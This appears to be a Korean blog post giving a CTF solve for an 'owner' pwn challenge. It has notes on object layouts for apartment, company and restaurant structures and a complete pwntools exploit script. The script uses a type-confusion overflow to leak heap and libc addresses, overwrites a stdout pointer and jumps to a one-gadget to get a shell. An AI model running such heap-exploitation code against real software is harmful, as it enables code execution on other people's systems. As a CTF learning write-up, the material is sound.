onegadget이 안먹히긴 하는데

실제 대회때는 먹혔겟지? 싶어서 stdout만 덮어보고 그냥 넘어감(다른데 덮을 만한곳 안해보긴했다 넘어가자)

c++살짝 익숙해졋다..!!


풀이 메모


빌딩 최대 세개


building

- name

[0][2]-apartment

[3][5]-company

[6][8]- restaurant


apartment(0x50)

-name a 

-floor a+32

-num of house per floor a+72

-description a+40 


company(0x58)

-name -0

-floor a+32

-people a+72

-money month a+80

-describe a+40(char)


restaurant(0x70)

-name -0

-menu - a+88

-visit people - a+72

-money month a+80

-price food -a+96

-customer pay - a+104

-describe - a+40


change할때 delete안함 그대로 주소만 옮김


apart (change)-> restaurant -> edit restaurant


그냥 빌딩 change하면서 overflow overwrite 가능

from pwn import *
#1.apart 2.company 3.restaurant
r=process('./owner')
def makeapart(name,floor,house,des):
	r.sendlineafter('>','1')
	r.sendlineafter('name?',name)
	r.sendlineafter('apartment?',str(floor))
	r.sendlineafter('floor?',str(house))
	r.sendlineafter('Describe',des)
def change(_from_type,_from,_to):
	r.sendlineafter('>','4')
	r.sendlineafter('>','2')
	r.sendlineafter('>',str(_from_type))
	r.sendlineafter('>',str(_from))
	r.sendlineafter('>',str(_to))
	r.sendlineafter('>','6')	#go to home menu
	r.sendlineafter('>','6')
def show(_type,num):
	r.sendlineafter('>','4')
	r.sendlineafter('>','1')
	r.sendlineafter('>',str(_type))
	r.sendlineafter('>',str(num))
	# be back 3 times
def edit(_type,num,obj,cont):
	r.sendlineafter('>','4')
	r.sendlineafter('>','1')
	r.sendlineafter('>',str(_type))
	r.sendlineafter('>',str(num))
	r.sendlineafter('>',str(obj))
	r.sendlineafter(':',cont)
	back()
def back():
	for i in range(3):
		r.sendlineafter('>','9')
makeapart('say2say2',1234,1234,'ABCDABCD')
makeapart('BBBBBBBB',1234,1234,'11111111')
change(1,1,2)
show(3,1)
r.recvuntil('Normal price of menu : ')
heapbase=int(r.recvuntil('\n')[:-1])-0x12cf0
log.info("heapleak : "+hex(heapbase))
back()
edit(3,1,1,'A'*0x100)
edit(3,1,6,str(heapbase+0x12d40))
show(1,1)
r.recvuntil('Name : ')
libcbase=u64(r.recv(6).ljust(8,'\x00'))-0xb78
log.info("libcbase : "+hex(libcbase))
stdoutjmp=libcbase+0x16f8
system=libcbase+0x45390
oneshot=libcbase+0xcc618#0xcc543#0x4526a#0xf0567#0xef6c4
back()
#r.interactive()
log.info("stdoutjmp :"+hex(stdoutjmp))
edit(3,1,6,str(stdoutjmp))
edit(1,1,1,p64(oneshot))
r.interactive()


'CTF' 카테고리의 다른 글

[codegate17 prequal]Goversing  (0) 2017.05.08
[plaid2017]pykemon  (0) 2017.04.24
[ASISctf] DLP  (2) 2017.04.13
asis secured portal  (0) 2017.04.13
[asisctf]wandere bits  (0) 2017.04.12

+ Recent posts

티스토리툴바